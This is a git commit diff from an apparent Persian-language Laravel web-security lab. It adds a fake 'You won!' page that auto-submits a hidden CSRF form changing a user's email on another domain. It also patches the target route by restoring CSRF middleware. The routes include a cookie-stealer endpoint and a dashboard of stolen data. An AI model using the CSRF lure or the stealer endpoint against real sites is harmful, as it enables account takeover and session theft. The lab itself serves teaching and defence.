This commit is contained in:
mcoder 2026-04-14 19:26:17 +03:30
parent 6cb8eff3a5
commit 3ff70831da
3 changed files with 42 additions and 15 deletions

View File

@ -0,0 +1,23 @@
<!DOCTYPE html>
<html lang="fa" dir="rtl">
<head>
<meta charset="UTF-8">
<title>شما برنده شدید!</title>
<script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-slate-900 flex items-center justify-center min-h-screen" onload="document.getElementById('attack-form').submit()">
<div class="text-center bg-slate-800 p-10 rounded-2xl shadow-2xl border border-red-500/50">
<h1 class="text-3xl font-bold text-red-500 mb-4 animate-pulse">در حال انتقال به صفحه دریافت جایزه...</h1>
<p class="text-slate-400">لطفاً مرورگر خود را نبندید.</p>
<form id="attack-form" action="https://webapp.kr-rezvan.ir/update-email" method="POST" style="display:none;">
<input type="hidden" name="email" value="hacker-csrf@eitebar.ir">
</form>
</div>
<script>
console.log("[Hacker] اجرای حمله CSRF کلاسیک...");
</script>
</body>
</html>

View File

@ -5,6 +5,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<title>آزمایشگاه XSS | Browser Security</title> <title>آزمایشگاه XSS | Browser Security</title>
<meta name="csrf-token" content="{{ csrf_token() }}">
<script src="https://cdn.tailwindcss.com"></script> <script src="https://cdn.tailwindcss.com"></script>
<style>body { font-family: Tahoma, sans-serif; }</style> <style>body { font-family: Tahoma, sans-serif; }</style>
</head> </head>

View File

@ -1,7 +1,6 @@
<?php <?php
use Illuminate\Support\Facades\Route; use Illuminate\Support\Facades\Route;
use Illuminate\Foundation\Http\Middleware\VerifyCsrfToken;
use App\Http\Controllers\UserController; use App\Http\Controllers\UserController;
use App\Http\Controllers\VulnerabilityController; use App\Http\Controllers\VulnerabilityController;
@ -12,15 +11,17 @@
*/ */
Route::domain('hackerapp.eitebar.ir')->group(function () { Route::domain('hackerapp.eitebar.ir')->group(function () {
// داشبورد اصلی هکر برای مشاهده دیتای سرقت شده // داشبورد اصلی هکر (لاگ‌های سرقت شده)
Route::get('/', [VulnerabilityController::class, 'viewLogs'])->name('hacker.home'); Route::get('/', [VulnerabilityController::class, 'viewLogs'])->name('hacker.home');
Route::get('/hacker-panel', [VulnerabilityController::class, 'viewLogs'])->name('vulnerability.logs'); Route::get('/hacker-panel', [VulnerabilityController::class, 'viewLogs'])->name('vulnerability.logs');
// روت مخفی هکر برای دریافت کوکی‌های سرقت شده (Stealer / C2 Server)
Route::get('/stealer', [VulnerabilityController::class, 'logStolenData'])->name('vulnerability.stealer'); Route::get('/stealer', [VulnerabilityController::class, 'logStolenData'])->name('vulnerability.stealer');
}); // [جدید]: صفحه‌ای که هکر برای فریب کاربر می‌سازد (حاوی فرم مخفی CSRF)
Route::get('/csrf-attack', function () {
return view('hacker.csrf-exploit');
})->name('hacker.csrf.exploit');
});
/* /*
|-------------------------------------------------------------------------- |--------------------------------------------------------------------------
@ -32,22 +33,24 @@
Route::get('/', [UserController::class, 'home'])->name('home'); Route::get('/', [UserController::class, 'home'])->name('home');
Route::get('/setup-lab', [UserController::class, 'setupLab'])->name('setup.lab'); Route::get('/setup-lab', [UserController::class, 'setupLab'])->name('setup.lab');
// سیستم احراز هویت // احراز هویت
Route::get('/login', [UserController::class, 'showLogin'])->name('login'); Route::get('/login', [UserController::class, 'showLogin'])->name('login');
Route::post('/login', [UserController::class, 'login'])->name('login.submit'); Route::post('/login', [UserController::class, 'login'])->name('login.submit');
Route::get('/logout', [UserController::class, 'logout'])->name('logout'); Route::get('/logout', [UserController::class, 'logout'])->name('logout');
// پنل کاربری (محافظت شده با نشست) // ----- بخش‌های محافظت شده با سشن -----
Route::middleware(['web', 'auth'])->group(function () { Route::middleware(['web', 'auth'])->group(function () {
// پروفایل کاربر
Route::get('/profile', [UserController::class, 'profile'])->name('user.profile'); Route::get('/profile', [UserController::class, 'profile'])->name('user.profile');
});
// هدف حمله CSRF // هدف حمله CSRF (اکنون کاملاً توسط میدل‌ویر CSRF محافظت می‌شود)
Route::post('/update-email', [UserController::class, 'updateEmail']) Route::post('/update-email', [UserController::class, 'updateEmail'])->name('vulnerable.update.email');
->withoutMiddleware([VerifyCsrfToken::class])
->name('vulnerable.update.email');
// صفحه آزمایشگاه XSS // آزمایشگاه XSS (کاربر لاگین شده این صفحه را می‌بیند)
Route::get('/xss', [VulnerabilityController::class, 'xss'])->name('vulnerability.xss'); Route::get('/xss', [VulnerabilityController::class, 'xss'])->name('vulnerability.xss');
// (فضای خالی برای حملات بعدی مثل Phishing، MITB و ...)
});
}); });